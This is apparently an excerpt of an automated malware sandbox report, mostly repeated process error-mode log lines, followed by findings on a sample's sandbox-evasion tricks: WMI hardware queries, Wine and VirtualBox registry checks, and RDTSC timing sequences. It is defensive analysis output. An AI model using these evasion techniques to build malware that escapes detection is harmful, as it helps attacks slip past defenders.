Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\random.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE7672 second address: FE7678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE7678 second address: FE767D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE767D second address: FE7683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
